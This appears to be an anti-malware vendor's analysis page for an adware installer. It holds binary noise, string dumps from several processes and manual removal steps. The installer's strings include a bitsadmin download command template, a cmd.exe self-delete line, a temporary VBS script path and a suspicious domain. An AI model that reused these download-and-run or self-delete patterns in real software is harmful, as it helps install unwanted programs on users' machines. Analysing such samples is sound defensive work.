...]...t.;.3.8gt\....F.$...A}.ex...:...,4..n%kF;.';3.../.......H.J.,|.
r..I..$%M..C...l..Y\.........Z.......9r..=A....X..........2[9 cJ$....D
3b.|....h. *......eh.........gR........ ..!..a.\y]..w..1.|....[.......
...8.Y.XT/.i.&.2i...??>.....EZS."........*#x..C...,T.......#%.js,.1
..tT#../...htZ9%.......V.v.ri..n.\A.......g. .\}..........lI..j.......
six}.^ .J]9.......t..Y.s..n.B..am%.Vkv...H4./&.4.E..C.w.?i..^&........
g2d:..'.&Gc...m.i...O..<...}4VeJ..2..Y......B..... .|.Y.r.?R.c.. ..
B....p,....rz..Q....O.h....c........?.yj.I..9..D.#....q.c.....8.....f.
.f.e.....M...gc.,..i:*....I=&6.o....*..l....hN.......8,(...9.4...O.u..
/.{..N.~..k.H.OX^......hYm..]c..#....V..1..d.m.Q....I.LX....].T.J.~7."
....6aA............itU.4B.G....Sz.~.c.A...59.....e...g{...%...T .N.@..
.>.6z.lR....%.......p..7s..Z.D>....D"Q.Z..S./a..c.`#-.......
<<< skipped >>>

The Application connects to the servers at the folowing location(s):

iexplore.exe_804:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_568:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

SearchProtocolHost.exe_2268:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_2952:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

Setup__2140_il2.exe_3512:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
fWIzyZ3CtqkwSGU6ncTUrL4WX1Iry5L3vqQTHEYD6bbBi5cnf1AG67zUnIwnb0UL86vGgIM5aFAV5qjUlos5fl0Ph5r6qKkUU3Auh5vnragKHGQ6w5/huucMU2Ury97mtr0dTz9A
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
noesis.beryline.1 = s 'Inst Class'
CLSID = s '{ca90508a-de03-464c-b43f-2ab03068b458}'
noesis.beryline = s 'Inst Class'
CurVer = s 'noesis.beryline.1'
ForceRemove {ca90508a-de03-464c-b43f-2ab03068b458} = s 'Inst Class'
ProgID = s 'noesis.beryline.1'
VersionIndependentProgID = s 'noesis.beryline'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016
: :):0:`:
3!3@3^3{3
3"3&3*3.395
1%2S2v2
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
dream.capture
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
%%X
version.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
selfdislikedfarfet.site


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Setup__2140_il2.exe:2308
    sevensetup.exe:3356
    %original file name%.exe:3580
    cpSetup.exe:3976
    5827498a25abb_ua.exe:2980
    run-setup.exe:3884

  2. Delete the original Application file.
  3. Delete or disinfect the following files created/modified by the Application:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now